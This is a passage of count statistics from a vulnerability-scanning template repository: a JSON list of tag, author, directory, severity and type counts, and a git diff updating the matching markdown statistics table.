,"count":1},{"name":"bazarr","count":1},{"name":"scimono","count":1},{"name":"cves2016","count":1},{"name":"twitter-server","count":1},{"name":"esmtp","count":1},{"name":"bitly","count":1},{"name":"zookeeper","count":1},{"name":"zeroshell","count":1},{"name":"ems","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"moin","count":1},{"name":"codeigniter","count":1},{"name":"doh","count":1},{"name":"wazuh","count":1},{"name":"alerta","count":1},{"name":"simplecrm","count":1},{"name":"karel","count":1},{"name":"synnefo","count":1},{"name":"couchbase","count":1},{"name":"socomec","count":1},{"name":"sco","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"livezilla","count":1},{"name":"micrsoft","count":1},{"name":"chyrp","count":1},{"name":"zm","count":1},{"name":"pmb","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"b2evolution","count":1},{"name":"ioncube","count":1},{"name":"lotus","count":1},{"name":"postmessage","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"cgi","count":1},{"name":"feifeicms","count":1},{"name":"rmi","count":1},{"name":"javafaces","count":1},{"name":"metabase","count":1},{"name":"xunchi","count":1},{"name":"htmli","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"openx","count":1},{"name":"mantisbt","count":1},{"name":"zenario","count":1},{"name":"clave","count":1},{"name":" default-login","count":1},{"name":"ssltls","count":1},{"name":"opentsdb","count":1},{"name":"sophos","count":1},{"name":"zarafa","count":1},{"name":"ntopng","count":1},{"name":"sidekiq","count":1},{"name":"elascticsearch","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"redis","count":1},{"name":"pippoint","count":1},{"name":"pagespeed","count":1},{"name":"lutron","count":1},{"name":"nette","count":1},{"name":"glances","count":1},{"name":"expose","count":1},{"name":"ewebs","count":1},{"name":"flash","count":1},{"name":"meraki","count":1},{"name":"k8s","count":1},{"name":"redwood","count":1},{"name":"asus","count":1},{"name":"csod","count":1},{"name":"viewpoint","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"avtech","count":1},{"name":"opensns","count":1},{"name":"appweb","count":1},{"name":"camunda","count":1},{"name":"enum","count":1},{"name":"nc2","count":1},{"name":"qsan","count":1},{"name":"sprintful","count":1},{"name":"upnp","count":1},{"name":"s3","count":1},{"name":"oneblog","count":1},{"name":"graphite","count":1},{"name":"kyan","count":1},{"name":"javascript","count":1},{"name":"ssl","count":1},{"name":"nomad","count":1},{"name":"vsphere","count":1},{"name":"bullwark","count":1},{"name":"dvr","count":1},{"name":"dotnetnuke","count":1},{"name":"huijietong","count":1},{"name":"blind","count":1},{"name":"nexusdb","count":1},{"name":"shoppable","count":1},{"name":"netdata","count":1},{"name":"wiki","count":1},{"name":"webmin","count":1},{"name":"embedthis","count":1},{"name":"addpac","count":1},{"name":"javamelody","count":1},{"name":"perl","count":1},{"name":"selea","count":1},{"name":"node-red-dashboard","count":1},{"name":"nedi","count":1},{"name":"yachtcontrol","count":1},{"name":"memcached","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"cofax","count":1},{"name":"circontrol","count":1},{"name":"spectracom","count":1},{"name":"faraday","count":1},{"name":"dnssec","count":1},{"name":"acme","count":1},{"name":"blackboard","count":1},{"name":"minio","count":1},{"name":"froxlor","count":1},{"name":"ghost","count":1},{"name":"darkstat","count":1},{"name":"jmx","count":1},{"name":"turbocrm","count":1},{"name":"xmlchart","count":1},{"name":"geutebruck","count":1},{"name":"eprints","count":1},{"name":"comodo","count":1},{"name":"zzzcms","count":1},{"name":"rsyncd","count":1},{"name":"servicedesk","count":1},{"name":"basic-auth","count":1},{"name":"kafdrop","count":1},{"name":"qcubed","count":1},{"name":"mara","count":1},{"name":"kubeflow","count":1},{"name":"monitorix","count":1},{"name":"jaspersoft","count":1},{"name":"jenzabar","count":1},{"name":"tjws","count":1},{"name":"openemr","count":1},{"name":"zyxel","count":1},{"name":"minimouse","count":1},{"name":"goahead","count":1},{"name":"tensorboard","count":1},{"name":"phpfastcache","count":1},{"name":"clusterengine","count":1},{"name":"qdpm","count":1},{"name":"dompdf","count":1},{"name":"influxdb","count":1},{"name":"skywalking","count":1},{"name":"office365","count":1},{"name":"linkedin","count":1},{"name":"alibaba","count":1},{"name":"klog","count":1},{"name":"jnoj","count":1},{"name":"proftpd","count":1},{"name":"aspnuke","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"nuuo","count":1},{"name":"jenkin","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"gateone","count":1},{"name":"webadmin","count":1},{"name":"biometrics","count":1},{"name":"duomicms","count":1},{"name":"kerbynet","count":1},{"name":"rdp","count":1},{"name":"setup","count":1},{"name":"xvr","count":1},{"name":"nordex","count":1},{"name":"lighttpd","count":1},{"name":"scs","count":1},{"name":"openvpn","count":1},{"name":"listserv","count":1},{"name":"rfi","count":1},{"name":"labtech","count":1},{"name":"crm","count":1},{"name":"iptime","count":1},{"name":"svnserve","count":1},{"name":"mongo","count":1},{"name":"csrf","count":1},{"name":"ulterius","count":1},{"name":"salesforce","count":1},{"name":"netgenie","count":1},{"name":"cocoon","count":1},{"name":"sarg","count":1},{"name":"interlib","count":1},{"name":"magicflow","count":1},{"name":"sqlite","count":1},{"name":"netrc","count":1},{"name":"plone","count":1},{"name":"zmanda","count":1},{"name":"oscommerce","count":1},{"name":"chevereto","count":1},{"name":"oidc","count":1},{"name":"gespage","count":1},{"name":"wing-ftp","count":1},{"name":"fiori","count":1},{"name":"calendarix","count":1},{"name":"pihole","count":1},{"name":"tika","count":1},{"name":"getsimple","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"haproxy","count":1},{"name":"qvisdvr","count":1},{"name":"totaljs","count":1},{"name":"domxss","count":1},{"name":"nps","count":1},{"name":"payara","count":1},{"name":"cloudinary","count":1},{"name":"vnc","count":1},{"name":"gitlist","count":1},{"name":"panabit","count":1},{"name":"rhymix","count":1},{"name":"diris","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"processmaker","count":1},{"name":"nimble","count":1},{"name":"whm","count":1},{"name":"szhe","count":1},{"name":"blue-ocean","count":1},{"name":"tongda","count":1},{"name":"lancom","count":1},{"name":"fortiweb","count":1},{"name":"sangfor","count":1},{"name":"trane","count":1},{"name":"dbeaver","count":1},{"name":"opm","count":1},{"name":"robomongo","count":1},{"name":"phalcon","count":1},{"name":"werkzeug","count":1},{"name":"octoprint","count":1},{"name":"plugin","count":1},{"name":"artica","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"krweb","count":1},{"name":"email","count":1},{"name":"tpshop","count":1},{"name":"trilithic","count":1},{"name":"tectuus","count":1},{"name":"vidyo","count":1},{"name":"clockwork","count":1},{"name":"octobercms","count":1},{"name":"burp","count":1},{"name":"alertmanager","count":1},{"name":"cse","count":1},{"name":"nsasg","count":1},{"name":"pyramid","count":1},{"name":"bigbluebutton","count":1},{"name":"webftp","count":1},{"name":"drone","count":1},{"name":"rujjie","count":1},{"name":"idemia","count":1},{"name":"wavlink","count":1},{"name":"circontrorl","count":1},{"name":"gotmls","count":1},{"name":"nweb2fax","count":1},{"name":"enumeration","count":1},{"name":"soar","count":1},{"name":"parentlink","count":1},{"name":"grails","count":1},{"name":"default","count":1},{"name":"monitorr","count":1},{"name":"mongoshake","count":1},{"name":"sourcebans","count":1},{"name":"expn","count":1},{"name":"postgres","count":1},{"name":"argussurveillance","count":1},{"name":"owasp","count":1},{"name":"manageengine","count":1},{"name":"flink","count":1},{"name":"commax","count":1},{"name":"lotuscms","count":1},{"name":"seacms","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"spidercontrol","count":1},{"name":"apos","count":1},{"name":"tieline","count":1},{"name":"eyelock","count":1},{"name":"ganglia","count":1},{"name":"tracer","count":1},{"name":"panos","count":1},{"name":"ruby","count":1},{"name":"wuzhicms","count":1},{"name":"gloo","count":1},{"name":"zend","count":1},{"name":"rmc","count":1},{"name":"st","count":1},{"name":"chinaunicom","count":1},{"name":"daybyday","count":1},{"name":"cyberoam","count":1},{"name":"fortinet","count":1},{"name":"phpunit","count":1},{"name":"smi","count":1},{"name":"mediumish","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"primetek","count":1},{"name":"bookstack","count":1},{"name":"tenda","count":1},{"name":"acontent","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"dotclear","count":1},{"name":"jitsi","count":1},{"name":"ilo4","count":1},{"name":"eg","count":1},{"name":"redhat","count":1},{"name":"redmine","count":1},{"name":"ruckus","count":1},{"name":"woocomernce","count":1},{"name":"ognl","count":1},{"name":"jeewms","count":1},{"name":"moinmoin","count":1},{"name":"xff","count":1},{"name":"fortigates","count":1},{"name":"tcexam","count":1},{"name":"clickhouse","count":1},{"name":"fastapi","count":1},{"name":"extractor","count":1},{"name":"nifi","count":1},{"name":"wavemaker","count":1},{"name":"weiphp","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"zcms","count":1},{"name":"sentry","count":1},{"name":"codemeter","count":1},{"name":"aruba","count":1},{"name":"smartsense","count":1},{"name":"achecker","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plc","count":1},{"name":"saltapi","count":1},{"name":"lg-nas","count":1},{"name":"fuelcms","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"wamp","count":1},{"name":"dom","count":1},{"name":"cloudflare","count":1},{"name":"wildfly","count":1},{"name":"arl","count":1},{"name":"phpinfo","count":1},{"name":"floc","count":1},{"name":"solarlog","count":1},{"name":"tidb","count":1},{"name":"mobileiron","count":1},{"name":"cobub","count":1},{"name":"concrete","count":1},{"name":"pulsesecure","count":1},{"name":"dvwa","count":1},{"name":"optiLink","count":1},{"name":"apiman","count":1},{"name":"finereport","count":1},{"name":"portainer","count":1},{"name":"viewlinc","count":1},{"name":"thinkadmin","count":1},{"name":"cors","count":1},{"name":"redcap","count":1},{"name":"graylog","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"jsp","count":1},{"name":"sgp","count":1},{"name":"gunicorn","count":1},{"name":"linux","count":1},{"name":"miscrsoft","count":1},{"name":"centos","count":1},{"name":"craftcms","count":1},{"name":"mariadb","count":1},{"name":"emby","count":1},{"name":"ricoh","count":1},{"name":"cockpit","count":1},{"name":"cherokee","count":1},{"name":"triconsole","count":1},{"name":"fortilogger","count":1},{"name":"mautic","count":1},{"name":"ueditor","count":1},{"name":"mrtg","count":1},{"name":"openstack","count":1},{"name":"xdcms","count":1},{"name":"expressjs","count":1},{"name":"hortonworks","count":1},{"name":"azkaban","count":1},{"name":"mantis","count":1},{"name":"myvuehelp","count":1},{"name":"lanproxy","count":1},{"name":"opensmtpd","count":1},{"name":"webui","count":1},{"name":"linksys","count":1},{"name":"myucms","count":1},{"name":"xiuno","count":1},{"name":"zte","count":1},{"name":"rabbitmq","count":1},{"name":"k8","count":1},{"name":"servicenow","count":1},{"name":"rubedo","count":1},{"name":"svn","count":1},{"name":"tamronos","count":1},{"name":"landray","count":1},{"name":"subrion","count":1},{"name":"cerebro","count":1},{"name":"exacqvision","count":1},{"name":"exponentcms","count":1},{"name":"websvn","count":1},{"name":"webmodule-ee","count":1},{"name":"ns","count":1},{"name":"timesheet","count":1},{"name":"commscope","count":1}],"authors":[{"name":"dhiyaneshdk","count":252},{"name":"pikpikcu","count":250},{"name":"daffainfo","count":199},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":60},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":23},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"johnk3r","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"jarijaas","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"g4l1t0","count":2},{"name":"parth","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"cocxanh","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"lotusdll","count":2},{"name":"pxmme1337","count":2},{"name":"gal nagli","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"bsysop","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"unstabl3","count":2},{"name":"randomrobbie","count":2},{"name":"socketz","count":2},{"name":"sushantkamble","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"0xprial","count":2},{"name":"arcc","count":2},{"name":"0xcrypto","count":2},{"name":"convisoappsec","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"nkxxkn","count":2},{"name":"0xrudra","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"ringo","count":1},{"name":"bernardofsr","count":1},{"name":"noamrathaus","count":1},{"name":"mah3sec_","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"juicypotato1","count":1},{"name":"ilovebinbash","count":1},{"name":"c3l3si4n","count":1},{"name":"ahmed sherif","count":1},{"name":"schniggie","count":1},{"name":"borna nematzadeh","count":1},{"name":"_harleo","count":1},{"name":"intx0x80","count":1},{"name":"j33n1k4","count":1},{"name":"alperenkesk","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"cookiehanhoan","count":1},{"name":"@dwisiswant0","count":1},{"name":"remonsec","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"furkansenan","count":1},{"name":"52971","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"sec_hawk","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"b0yd","count":1},{"name":"makyotox","count":1},{"name":"shifacyclewla","count":1},{"name":"th3.d1p4k","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sshell","count":1},{"name":"iampritam","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"omarkurt","count":1},{"name":"rodnt","count":1},{"name":"berkdusunur","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"affix","count":1},{"name":"b4uh0lz","count":1},{"name":"kabirsuda","count":1},{"name":"kurohost","count":1},{"name":"sullo","count":1},{"name":"knassar702","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"philippdelteil","count":1},{"name":"bjhulst","count":1},{"name":"pdp","count":1},{"name":"smaranchand","count":1},{"name":"0ut0fb4nd","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"patralos","count":1},{"name":"jeya seelan","count":1},{"name":"notsoevilweasel","count":1},{"name":"jteles","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sy3omda","count":1},{"name":"alph4byt3","count":1},{"name":"ldionmarcil","count":1},{"name":"blckraven","count":1},{"name":"yavolo","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mubassirpatel","count":1},{"name":"hakluke","count":1},{"name":"co0nan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"raesene","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"adrianmf","count":1},{"name":"izn0u","count":1},{"name":"apt-mirror","count":1},{"name":"thezakman","count":1},{"name":"ooooooo_q","count":1},{"name":"andysvints","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"infosecsanyam","count":1},{"name":"its0x08","count":1},{"name":"elmahdi","count":1},{"name":"alex","count":1},{"name":"ahmetpergamum","count":1},{"name":"revblock","count":1},{"name":"becivells","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"bad5ect0r","count":1},{"name":"tirtha_mandal","count":1},{"name":"bolli95","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"shreyapohekar","count":1},{"name":"tim_koopmans","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"micha3lb3n","count":1},{"name":"yashanand155","count":1},{"name":"0xrod","count":1},{"name":"toufik airane","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"0xtavian","count":1},{"name":"b0rn2r00t","count":1},{"name":"fopina","count":1},{"name":"gboddin","count":1},{"name":"exploitation","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"sicksec","count":1},{"name":"ipanda","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"regala_","count":1},{"name":"ajaysenr","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"taielab","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"s1r1u5_","count":1},{"name":"pratik khalane","count":1},{"name":"pudsec","count":1},{"name":"streetofhackerr007","count":1}],"directory":[{"name":"cves","count":696},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":247},{"name":"exposures","count":186},{"name":"technologies","count":178},{"name":"misconfiguration","count":131},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":625},{"name":"high","count":540},{"name":"medium","count":428},{"name":"critical","count":267},{"name":"low","count":147}],"types":[{"name":"http","count":1904},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a7efc05b55..4f95b9d14a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,750 +1,799 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | -| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | -| tech | 111 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | -| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | -| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | -| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 60 | techbrunchfr | 13 | | | | | | | -| joomla | 59 | suman_kar | 12 | | | | | | | -| iot | 58 | cyllective | 11 | | | | | | | -| cve2010 | 51 | r3dg33k | 11 | | | | | | | -| cve2017 | 49 | random_robbie | 10 | | | | | | | -| oob | 48 | righettod | 10 | | | | | | | -| file | 46 | wdahlenb | 9 | | | | | | | -| unauth | 45 | melbadry9 | 9 | | | | | | | -| network | 39 | nadino | 9 | | | | | | | -| sqli | 38 | hackergautam | 9 | | | | | | | -| ssrf | 35 | that_juan_ | 8 | | | | | | | -| cve2016 | 32 | aashiq | 8 | | | | | | | -| oracle | 31 | iamthefrogy | 8 | | | | | | | -| logs | 30 | kophjager007 | 7 | | | | | | | -| workflow | 30 | techryptic (@tech) | 7 | | | | | | | -| redirect | 28 | randomstr1ng | 7 | | | | | | | -| jira | 28 | dogasantos | 7 | | | | | | | -| atlassian | 27 | emadshanab | 7 | | | | | | | -| listing | 25 | dr_set | 7 | | | | | | | -| misc | 23 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 20 | harshbothra_ | 7 | | | | | | | -| disclosure | 20 | oppsec | 7 | | | | | | | -| cisco | 19 | meme-lord | 6 | | | | | | | -| generic | 19 | logicalhunter | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| router | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| auth-bypass | 17 | ganofins | 5 | | | | | | | -| springboot | 16 | elsfa7110 | 5 | | | | | | | -| debug | 15 | yanyun | 5 | | | | | | | -| cve2014 | 15 | joanbono | 5 | | | | | | | -| misconfig | 14 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | rootxharsh | 5 | | | | | | | -| cve2011 | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | iamnoooob | 5 | | | | | | | -| php | 13 | xelkomy | 4 | | | | | | | -| adobe | 13 | e_schultze_ | 4 | | | | | | | -| fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | -| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | -| devops | 12 | impramodsargar | 3 | | | | | | | -| dlink | 12 | emenalf | 3 | | | | | | | -| dns | 12 | incogbyte | 3 | | | | | | | -| jenkins | 12 | 0w4ys | 3 | | | | | | | -| cve2013 | 11 | mavericknerd | 3 | | | | | | | -| zoho | 11 | shine | 3 | | | | | | | -| magento | 9 | f1tz | 3 | | | | | | | -| xxe | 9 | binaryfigments | 3 | | | | | | | -| ftp | 9 | fyoorer | 3 | | | | | | | -| aws | 9 | vsh00t | 3 | | | | | | | -| ruijie | 8 | lu4nx | 3 | | | | | | | -| scada | 8 | z3bd | 3 | | | | | | | -| login | 8 | dudez | 3 | | | | | | | -| cnvd | 8 | jarijaas | 3 | | | | | | | -| gitlab | 8 | shifacyclewala | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | _generic_human_ | 3 | | | | | | | -| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | -| kubernetes | 7 | hahwul | 2 | | | | | | | -| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| netgear | 7 | swissky | 2 | | | | | | | -| cve2009 | 7 | 0xprial | 2 | | | | | | | -| files | 7 | w4cky_ | 2 | | | | | | | -| backup | 7 | 0xcrypto | 2 | | | | | | | -| coldfusion | 7 | 0xrudra | 2 | | | | | | | -| vmware | 7 | cocxanh | 2 | | | | | | | -| google | 6 | gal nagli | 2 | | | | | | | -| api | 6 | lotusdll | 2 | | | | | | | -| solr | 6 | koti2 | 2 | | | | | | | -| cve2008 | 6 | fabaff | 2 | | | | | | | -| django | 6 | pxmme1337 | 2 | | | | | | | -| dell | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | random-robbie | 2 | | | | | | | -| jetty | 6 | unstabl3 | 2 | | | | | | | -| docker | 6 | ree4pwn | 2 | | | | | | | -| laravel | 6 | johnjhacking | 2 | | | | | | | -| citrix | 6 | dheerajmadhukar | 2 | | | | | | | -| confluence | 6 | 0xsapra | 2 | | | | | | | -| windows | 5 | afaq | 2 | | | | | | | -| circarlife | 5 | foulenzer | 2 | | | | | | | -| drupal | 5 | 0xelkomy | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | moritz nentwig | 2 | | | | | | | -| microsoft | 5 | arcc | 2 | | | | | | | -| fileupload | 5 | bsysop | 2 | | | | | | | -| java | 5 | hetroublemakr | 2 | | | | | | | -| nodejs | 5 | randomrobbie | 2 | | | | | | | -| ssti | 5 | huowuzhao | 2 | | | | | | | -| printer | 5 | nkxxkn | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| iis | 5 | socketz | 2 | | | | | | | -| wp-theme | 5 | davidmckennirey | 2 | | | | | | | -| dedecms | 5 | gevakun | 2 | | | | | | | -| ibm | 5 | joeldeleep | 2 | | | | | | | -| hongdian | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | mohammedsaneem | 2 | | | | | | | -| crlf | 4 | amsda | 2 | | | | | | | -| samsung | 4 | ehsahil | 2 | | | | | | | -| wso2 | 4 | whoever | 2 | | | | | | | -| solarwinds | 4 | bing0o | 2 | | | | | | | -| vpn | 4 | vavkamil | 2 | | | | | | | -| traversal | 4 | sushantkamble | 2 | | | | | | | -| artifactory | 4 | r3naissance | 2 | | | | | | | -| deserialization | 4 | convisoappsec | 2 | | | | | | | -| tomcat | 4 | g4l1t0 | 2 | | | | | | | -| firmware | 4 | x1m_martijn | 2 | | | | | | | -| zimbra | 4 | alifathi-h1 | 2 | | | | | | | -| thinkphp | 4 | manas_harsh | 2 | | | | | | | -| jolokia | 4 | parth | 2 | | | | | | | -| glpi | 4 | kurohost | 1 | | | | | | | -| grafana | 4 | ldionmarcil | 1 | | | | | | | -| elastic | 4 | notsoevilweasel | 1 | | | | | | | -| exchange | 4 | luskabol | 1 | | | | | | | -| asp | 4 | c3l3si4n | 1 | | | | | | | -| buffalo | 4 | zandros0 | 1 | | | | | | | -| thinkcmf | 4 | udyz | 1 | | | | | | | -| hp | 4 | sickwell | 1 | | | | | | | -| symfony | 4 | b4uh0lz | 1 | | | | | | | -| webserver | 4 | akshansh | 1 | | | | | | | -| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| zhiyuan | 3 | deena | 1 | | | | | | | -| ebs | 3 | revblock | 1 | | | | | | | -| fpd | 3 | hanlaomo | 1 | | | | | | | -| lfr | 3 | mah3sec_ | 1 | | | | | | | -| resin | 3 | akash.c | 1 | | | | | | | -| caucho | 3 | defr0ggy | 1 | | | | | | | -| mongodb | 3 | elder tao | 1 | | | | | | | -| ofbiz | 3 | divya_mudgal | 1 | | | | | | | -| openssh | 3 | x6263 | 1 | | | | | | | -| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | -| opensis | 3 | me9187 | 1 | | | | | | | 